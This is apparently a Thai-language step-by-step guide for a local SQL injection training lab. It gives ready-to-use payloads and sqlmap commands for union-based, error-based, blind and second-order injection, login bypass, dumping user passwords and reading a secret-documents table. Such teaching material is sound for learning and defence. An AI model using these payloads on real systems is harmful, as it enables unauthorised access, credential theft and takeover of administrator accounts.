================================================================
คู่มือการทดลอง SQL INJECTION TRAINING LAB (ภาษาไทย)
================================================================
หมายเหตุ: ไฟล์นี้รวบรวมขั้นตอนการทดลองและ Payload สำหรับการเรียนรู้
กรุณาทำตามขั้นตอนทีละขั้นเพื่อทำความเข้าใจช่องโหว่แต่ละแบบ
================================================================

[ LAB 1: Union-Based SQL Injection ]
เป้าหมาย: ดึงข้อมูลจากตารางอื่น (เช่น ตาราง users) โดยใช้คำสั่ง UNION

ขั้นตอนที่ 1: ไปที่เมนู "Technology" (Lab 1)
ขั้นตอนที่ 2: ลองใส่ Article ID ปกติ (เช่นเลข 1) เพื่อดูผลลัพธ์
ขั้นตอนที่ 3: ทดสอบช่องโหว่โดยพิมพ์เครื่องหมาย single quote: '
ขั้นตอนที่ 4: หาจำนวนคอลัมน์ (ลองสุ่มเลขไปเรื่อยๆ จนกว่าจะ Error):
            1 ORDER BY 1 # (ผ่าน)
            1 ORDER BY 2 # (ผ่าน)
            1 ORDER BY 3 # (ผ่าน)
            1 ORDER BY 4 # (Error -> แสดงว่ามีแค่ 3 คอลัมน์)
ขั้นตอนที่ 5: ใช้ UNION เพื่อดึงข้อมูลชื่อฐานข้อมูล:
            0 UNION SELECT 1, database(), user() #
ขั้นตอนที่ 6: ดึงชื่อผู้ใช้และรหัสผ่านจากตาราง users:
            0 UNION SELECT 1, username, password FROM users #


[ LAB 2: Automated SQL Injection ]
เป้าหมาย: ใช้เครื่องมือ sqlmap ในการเจาะระบบอัตโนมัติ

ขั้นตอนที่ 1: ไปที่เมนู "Archive" (Lab 2)
ขั้นตอนที่ 2: เปิด Terminal หรือ CMD
ขั้นตอนที่ 3: สั่ง sqlmap เพื่อดูรายชื่อฐานข้อมูล:
            sqlmap -u "http://localhost:8080/lab_auto.php?id=1" --batch --dbs
ขั้นตอนที่ 4: ดูรายชื่อตารางในฐานข้อมูล 'sqli_lab':
            sqlmap -u "http://localhost:8080/lab_auto.php?id=1" -D sqli_lab --tables --batch
ขั้นตอนที่ 5: ดูดข้อมูลทั้งหมดในตาราง 'users':
            sqlmap -u "http://localhost:8080/lab_auto.php?id=1" -D sqli_lab -T users --dump --batch


[ LAB 3: Authentication Bypass ]
เป้าหมาย: เข้าสู่ระบบเป็น Admin โดยไม่ต้องรู้รหัสผ่าน

ขั้นตอนที่ 1: ไปที่เมนู "Login" (Lab 3)
ขั้นตอนที่ 2: ลอง Login มั่วๆ ดูก่อนเพื่อให้เห็นว่าเข้าไม่ได้
ขั้นตอนที่ 3: ในช่อง Username ให้ใส่ Payload นี้:
            admin' #
ขั้นตอนที่ 4: ในช่อง Password ใส่อะไรก็ได้ (เช่น 1234)
ขั้นตอนที่ 5: กด Login -> ระบบจะพาเข้าสู่หน้า Admin ทันที!


[ LAB 4: Error-Based SQL Injection ]
เป้าหมาย: ดึงข้อมูลโดยการอ่านจาก Error Message ของฐานข้อมูล

ขั้นตอนที่ 1: ไปที่เมนู "Support" (Lab 4)
ขั้นตอนที่ 2: ลองทำให้ระบบ Error โดยใส่เครื่องหมาย:
            '
ขั้นตอนที่ 3: สังเกตข้อความ Error สีแดงที่แจ้งเตือนมาจาก MySQL
ขั้นตอนที่ 4: ยิง Payload เพื่อดึง Version ของฐานข้อมูลผ่าน Error:
            1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e)) #
ขั้นตอนที่ 5: ยิง Payload เพื่อดึงชื่อฐานข้อมูล:
            1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e)) #


[ LAB 5: Blind SQL Injection ]
เป้าหมาย: เดาข้อมูลโดยการถามคำถาม ใช่/ไม่ใช่ (True/False) กับฐานข้อมูล

ขั้นตอนที่ 1: ไปที่เมนู "Offers" (Lab 5)
ขั้นตอนที่ 2: ใส่รหัสคูปองที่ถูกต้อง (เลข 1) -> ระบบตอบ "Valid"
ขั้นตอนที่ 3: ทดสอบเงื่อนไขที่เป็น "จริง" (ต้องได้ผลลัพธ์ Valid เหมือนเดิม):
            1 AND 1=1
ขั้นตอนที่ 4: ทดสอบเงื่อนไขที่เป็น "เท็จ" (ผลลัพธ์ต้องเปลี่ยนไป หรือหาไม่เจอ):
            1 AND 1=2
ขั้นตอนที่ 5: ลองเดาความยาวของ Version (ต้องเดาเองทีละตัว):
            1 AND LENGTH(VERSION()) > 5


[ LAB 6: Second-Order SQL Injection ]
เป้าหมาย: เปลี่ยนรหัสผ่านของ Admin ตัวจริง โดยการสมัครสมาชิกชื่อปลอม

ขั้นตอนที่ 1: ไปที่เมนู "HR Portal" (Lab 6)
ขั้นตอนที่ 2: สมัครสมาชิกใหม่ (Register) โดยตั้งชื่อ Username ว่า:
            admin' #
            (รหัสผ่านตั้งอะไรก็ได้ เช่น "1234")
ขั้นตอนที่ 3: Login ด้วย User ที่เพิ่งสมัคร ("admin' #")
ขั้นตอนที่ 4: ไปที่เมนู "Reset Password"
ขั้นตอนที่ 5: เปลี่ยนรหัสผ่านใหม่เป็น "hacked123"
            * ด้วยผลของ SQL Injection ในชื่อเรา คำสั่งจะกลายเป็น:
              UPDATE users SET password='...' WHERE username='admin' #'
            * ซึ่งมันไปตรงกับเงื่อนไขของ Admin ตัวจริงพอดี!
ขั้นตอนที่ 6: Logout ออกจากระบบ
ขั้นตอนที่ 7: ลอง Login ID "admin" ด้วยรหัส "hacked123" -> เข้าได้สำเร็จ!


[ LAB 9: File Read/Write (Transparency) ]
เป้าหมาย: แอบอ่านไฟล์ความลับในเครื่อง Server

ขั้นตอนที่ 1: ไปที่เมนู "Transparency" (Lab 9)
ขั้นตอนที่ 2: ใส่ ID ปกติ: 1
ขั้นตอนที่ 3: ยิง Payload เพื่อขโมยข้อมูลจากตารางเอกสารลับ 'secret_documents':
            0 UNION SELECT 1, filename, content FROM secret_documents
ขั้นตอนที่ 4: สังเกตผลลัพธ์ด้านล่าง จะมีเอกสารลับ (confidential.txt) โผล่ขึ้นมาต่อท้ายเนียนๆ
